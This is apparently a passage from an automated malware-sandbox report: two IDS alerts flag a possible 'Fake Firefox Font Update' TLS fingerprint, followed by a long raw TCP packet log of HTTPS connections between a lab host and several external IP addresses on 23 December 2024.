| 2024-12-23T07:26:48.168779+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49739 | 185.166.143.49 | 443 | TCP |
| 2024-12-23T07:26:50.605999+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49745 | 3.5.16.86 | 443 | TCP |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.502515078 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.502630949 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.502796888 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.502804995 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.502816916 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.502851963 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.783937931 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.783983946 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.784064054 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.784392118 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.784404993 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:30.005189896 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:30.005398989 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:30.006711960 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:30.006721973 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:30.007009983 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:30.008263111 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:30.008456945 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:30.008485079 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:31.061589956 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:31.061697006 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:31.061753988 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:31.061835051 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:31.061853886 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:31.206490993 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:31.206527948 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:31.206620932 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:31.206933022 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:31.206952095 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:32.417979956 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:32.418081999 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:32.420639038 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:32.420656919 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:32.420891047 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:32.421999931 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:32.422163963 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:32.422183990 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:32.422230005 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:32.422235966 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:33.413780928 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:33.413898945 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:33.413976908 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:33.414084911 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:33.414129972 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:33.639875889 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:33.639931917 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:33.640002966 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:33.640320063 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:33.640333891 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:34.851517916 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:34.851600885 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:34.852838039 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:34.852850914 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:34.853085041 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:34.854262114 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:34.854412079 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:34.854433060 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:34.854492903 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:34.854499102 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:35.828738928 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:35.828834057 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:35.828887939 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:35.829310894 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:35.829338074 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:36.219551086 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:36.219624996 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:36.219706059 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:36.220068932 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:36.220093012 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:37.433862925 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:37.433943987 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:37.435705900 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:37.435717106 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:37.435985088 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:37.437661886 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:37.437786102 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:37.437792063 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:38.213154078 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:38.213244915 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:38.213295937 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:38.213459015 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:38.213478088 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:38.731477976 CET49716443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.438051939 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.438065052 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.438081026 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.481802940 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.571194887 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.571217060 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.571327925 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.571343899 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.571383953 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.579379082 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.579554081 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.579598904 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.579607964 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.607844114 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.607891083 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.607935905 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.607944965 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.607983112 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.657439947 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.657457113 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.657480001 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.657582998 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.657608986 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.657634020 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.700548887 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.706907034 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.706923008 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.706960917 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.706989050 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.707005024 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.707040071 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.747443914 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.754165888 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.754173994 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.754200935 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.754262924 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.754276991 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.754308939 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.754328966 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.758893967 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.785581112 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.785598040 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.785680056 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.785690069 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.815203905 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.815249920 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.815279961 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.815321922 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.815341949 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.815366030 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.815392971 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.835474014 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.835499048 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.835521936 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.835553885 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.835562944 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.835587025 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.852783918 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.852817059 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.852854013 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.852864981 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.852888107 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.870100021 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.870141983 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.870179892 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.870187998 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.870230913 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.872468948 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.872515917 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.887257099 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.887279034 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.887346983 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.887353897 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.887392044 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.889559031 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.905594110 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.905616045 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.905649900 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.905662060 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.905694008 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.920373917 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.920393944 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.920437098 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:51.920447111 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.415376902 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.415425062 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.415529013 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.415534019 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.415611982 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.416177034 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.416217089 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.419851065 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.419872999 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.419940948 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.419946909 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.419990063 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.420619011 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.424334049 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.424355030 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.424405098 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.424412966 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.428715944 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.428741932 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.428770065 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.428776026 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.428826094 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.428831100 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.428879976 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.432858944 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.432882071 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.432919025 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.432924986 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.432960987 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.432988882 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.432996035 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.437355995 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.437377930 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.437448978 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.437453985 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.441020012 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.441046953 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.441081047 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.441087008 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.441126108 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.441850901 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.441889048 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.464430094 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.605871916 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.605895996 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.605942011 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.606013060 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.606029034 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.606064081 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.609477997 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.609498024 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.609563112 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.609574080 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.613943100 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.613980055 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.614011049 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.614017963 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.614058971 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.618426085 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.618457079 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.618491888 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.618496895 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.618505955 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.618522882 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.618545055 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.622817039 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.622833967 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.622879982 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.622886896 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.622922897 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.622947931 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.622982025 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.627063990 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.627088070 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.627149105 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.627155066 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.627177954 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.627199888 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.627203941 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.631464005 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.631484032 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.631548882 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.631556988 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:52.631603956 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.196902990 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.196913004 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.200970888 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.200992107 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.201095104 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.201095104 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.201102972 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.204822063 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.205517054 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.205538034 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.205585957 CET443497453.5.16.86192.168.2.5
